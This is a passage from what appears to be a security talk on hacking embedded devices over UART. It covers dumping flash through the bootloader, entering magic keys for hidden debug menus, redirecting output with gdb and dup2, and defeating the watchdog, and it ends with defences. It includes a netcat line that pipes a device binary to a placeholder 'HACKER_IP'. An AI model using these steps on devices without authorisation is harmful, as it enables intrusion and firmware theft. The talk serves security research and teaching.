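    with serial.Serial(port, baud, timeout=60) as ser, open(out_path, "wb") as f:
        ser.write(b"\n")
        ser.read_until(prompt)
        cmd(ser, b"sf probe 0:0")
        cmd(ser, f"sf read {load_addr:#x} {offset:#x} {length:#x}".encode())
        written = 0
        for pos in range(0, length, chunk):
            n = min(chunk, length - pos)
            data = parse_md_dump(cmd(ser, f"md.l {load_addr + pos:#x} {n // 4:#x}".encode()))
            if len(data) != n:
                raise IOError(f"short chunk at {pos:#x}: {len(data)} of {n} bytes")
            f.write(data)
            written += n
    return written
```

Dumping through md is slow: every 16 bytes of flash costs about 75 characters of text, so at 115200 bps the payload rate is only a few KB/s and a 10 MB partition takes the better part of an hour. If the bootloader has a network stack, tftpboot/tftpput is far faster; md is the fallback when the UART is all you have.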
17. Neither shell nor bootloader appears: magic key
IPTIME: a magic key?
Finding the magic key in IDA (inittime binary)
Finding the magic key (inittime): Magic key = xdiag
Magic key entry example (1): https://www.youtube.com/watch?v=fua6dygqgxe
Magic key entry example (2): typing "debug" must match five times in a row before serial input is enabled; then entering "1198282\n1198282\n" opens the debug menu.

[SERIAL INPUT MANAGE] 1-th ENABLE Magic serial input match!
[SERIAL INPUT MANAGE] 2-th ENABLE Magic serial input match!
[SERIAL INPUT MANAGE] 3-th ENABLE Magic serial input match!
[SERIAL INPUT MANAGE] 4-th ENABLE Magic serial input match!
[SERIAL INPUT MANAGE] 5-th ENABLE Magic serial input match!
[SERIAL INPUT MANAGE] serial input ENABLE!!!!!

====================================
[ TOP Debug Menu]
------------------------------------
 1 : SubSystem Print On/Off
 2 : Platform Print Setting
 3 : TD Print Setting
 4 : Performance Print Setting
 5 : Sdal Print Setting
 6 : Sdal Trace Setting
10 : Factory Debug
11 : TD Debug
12 : SubSystem DBG
20 : Performance File Write
21 : Louvre Print Setting
22 : JavaMW Print Setting
30 : Auto Lock DBG
------------------------------------
50 : ROSE Debug
60 : MediaLink Debug
70 : Jade Debug
====================================
99 : Exit
====================================
DBG> :
18. I want to see the UART messages in a PTS: dup2()
What are TTY and PTS? TTY: teletypewriter (tele-, "at a distance"), a machine that turned each manually typed character into a coded electrical signal; the name stuck for terminal devices. PTS (PTY): a pseudo-terminal, the kind a telnet or ssh session gets.
Saving the serial output to a file: when you obtained a shell some other way (telnet, ssh, command injection) you cannot see what the program prints to the serial console. Attach gdb to the process and redirect its output with dup2() (duplicate file descriptor).
Saving the serial output to a file: the gdb session. The (int) casts are needed on stripped binaries, where gdb does not know the functions' return types, and O_CREAT requires the mode argument.

(gdb) attach PID
(gdb) call (int)open("/tmp/mong.log", 66, 0644)    # 66 = O_RDWR|O_CREAT
$1 = 8
(gdb) call (int)dup2(8, 1)                         # the process's stdout now goes to the log
(gdb) call (int)dup2(8, 2)                         # and its stderr
(gdb) detach

# tail -f /tmp/mong.log
19. The device reboots whenever I use gdb: watchdog
What is a watchdog? It monitors whether the device or server is still running normally and reboots it automatically when it is not. Software must send it a keepalive ("kick") periodically, through /dev/watchdog or /dev/wdt.
Watchdog code analysis: the daemon opens the watchdog device and kicks it in a loop. While gdb holds the process stopped (at a breakpoint, for instance) no kick is sent, the 5-second timeout expires and the board resets.
Watchdog code analysis (IDA decompiler output; the comments map the ioctl numbers to the watchdog ioctls)

int fastcall sub_61c30()
{
    int32 v0;   // r0@1
    int v1;     // r0@1
    int v2;     // r4@1
    int v4;     // [sp+4h] [bp-14h]@1

    v4 = 0;
    v0 = sub_b258();
    sub_5c698(v0, "wdt");
    v1 = open("/dev/wdt", 2);
    v2 = v1;
    if ( v1 )
    {
        ioctl(v1, 0x80045707u, &v4);                  // WDIOC_GETTIMEOUT
        printf("wdt: default timeout: %d sec.\n", v4);
        v4 = 5;
        ioctl(v2, 0xC0045706u, &v4);                  // WDIOC_SETTIMEOUT (5 seconds)
        ioctl(v2, 0x80045707u, &v4);                  // WDIOC_GETTIMEOUT
        printf("wdt: default timeout: %d sec.\n", v4);
        while ( !dword_3a8aa0 )
        {
            ioctl(v2, 0x80045705u, 0);                // WDIOC_KEEPALIVE
            usleep();
        }
        close(v2);
        puts("!!!===wdt exit===!!!");
    }
    else
    {
        printf("wdt: open(%s) failed!\n", "/dev/wdt");
    }
    return 0;
}
Watchdog keepalive code: a stand-alone kicker to run in the background while the real daemon is stopped under gdb. Most watchdog drivers allow only one opener, so if open() fails with EBUSY the daemon still holds the device; kill it and start this program within the timeout.

#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <linux/watchdog.h>

int main(int argc, char *argv[])
{
    int fd, dummy = 0;

    fd = open("/dev/wdt", O_WRONLY);
    if (fd < 0) {
        perror("open /dev/wdt");
        return 1;
    }
    /* Kick the watchdog once a second, well inside its 5-second timeout. */
    while (1) {
        ioctl(fd, WDIOC_KEEPALIVE, &dummy);
        sleep(1);
    }
    close(fd);   /* not reached */
    return 0;
}
Watchdog disable code: ask the driver to stop the watchdog entirely. This works only if the driver implements WDIOC_SETOPTIONS and was not built with nowayout; on drivers that support the magic close, writing "V" before close() has the same effect.

#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <linux/watchdog.h>

int main(int argc, char *argv[])
{
    int fd, flags = WDIOS_DISABLECARD;

    fd = open("/dev/wdt", O_WRONLY);
    if (fd < 0) {
        perror("open /dev/wdt");
        return 1;
    }
    if (ioctl(fd, WDIOC_SETOPTIONS, &flags) < 0)
        perror("WDIOC_SETOPTIONS");
    close(fd);
    return 0;
}
20. I can't get the binary files off the device
Getting binaries off the device:
- Use nc, ftp, scp, etc. On the device: cat /usr/bin/server | nc HACKER_IP PORT. On the host: nc -l PORT > server (or nc -l -p PORT, depending on the netcat variant).
- Symbolic link into the web root, then fetch it with a browser or wget: ln -s /usr/bin/server /var/www/html/server
- Use a network filesystem: mount an NFS export from your host and copy the files over.
- Hex dump over the console when there is no network at all: xxd, hexview, od, then rebuild the file on the host.
File transfer using NFS
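The hex-dump route from case 20 worked through, as an added example that is not part of the original talk: rebuild_from_xxd() accepts the output of xxd FILE or xxd -p FILE copied from the serial console, and verify_transfer() checks the result against the size and MD5 the target itself reports (wc -c, md5sum), because a dropped or wrapped terminal line silently corrupts the copy. The sample dump is constructed.

```python
# Added example: rebuild a file from xxd output pasted from the console and verify it.
# Not the speaker's code.
import hashlib
import re
from typing import Tuple

_XXD_LINE = re.compile(r"^([0-9a-fA-F]{1,16}):\s*((?:[0-9a-fA-F]{2,4}\s?)+)")
_PLAIN_HEX = re.compile(r"^[0-9a-fA-F]+$")


def rebuild_from_xxd(text: str) -> bytes:
    """Turn xxd output back into bytes.

    Default xxd lines look like '00000000: 7f45 4c46 0101 0100 ...  .ELF....'; the
    ASCII column is dropped and offsets must be contiguous, so a lost line is caught.
    'xxd -p' lines are bare hex and are taken as-is. A line consisting only of '*'
    means the dump came from hexdump/od without -v (repeats squeezed) and cannot
    be rebuilt. Anything else (prompts, the echoed command) is skipped.
    """
    out = bytearray()
    expected = 0
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "*":
            raise ValueError("squeezed repeat marker '*': re-run the dump with -v")
        m = _XXD_LINE.match(line)
        if m:
            off = int(m.group(1), 16)
            if off != expected:
                raise ValueError(f"offset {off:#x} but expected {expected:#x}: a line was lost")
            chunk = bytes.fromhex(m.group(2).replace(" ", ""))
        elif _PLAIN_HEX.match(line) and len(line) % 2 == 0:
            chunk = bytes.fromhex(line)
        else:
            continue
        out += chunk
        expected += len(chunk)
    return bytes(out)


def md5_hex(data: bytes) -> str:
    """Hex MD5, in the same form md5sum prints on the target."""
    return hashlib.md5(data).hexdigest()


def verify_transfer(data: bytes, target_size: int, target_md5: str) -> Tuple[bool, str]:
    """Compare the rebuilt file with the 'wc -c' and 'md5sum' values copied from the target."""
    if len(data) != target_size:
        return False, f"size mismatch: got {len(data)}, target reports {target_size}"
    digest = md5_hex(data)
    if digest != target_md5.strip().lower():
        return False, f"md5 mismatch: got {digest}, target reports {target_md5}"
    return True, digest


if __name__ == "__main__":
    # constructed console capture of a tiny file
    capture = (
        "# xxd /tmp/hello\n"
        "00000000: 7f45 4c46 0101 0100 0000 0000 0000 0000  .ELF............\n"
        "00000010: 0200 2800 0100 0000                      ..(.....\n"
        "# "
    )
    blob = rebuild_from_xxd(capture)
    print(len(blob), blob[:4])          # 24 b'\x7fELF'
    print(verify_transfer(blob, 24, md5_hex(blob)))
```

Capture the hash and size in a separate command rather than in the same scrollback as the dump: a bare 32-character hash line would otherwise be taken for an xxd -p line and appended to the file.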
Defending against UART hacking: disable the UART port when the product ships; disable the UART function in software; demand a secret key before accepting input; use a non-standard baud rate; gate the UART behind an enable/disable jumper; encrypt the UART communication.
Q/A
Thank you! Special thanks to Lee Won, SHC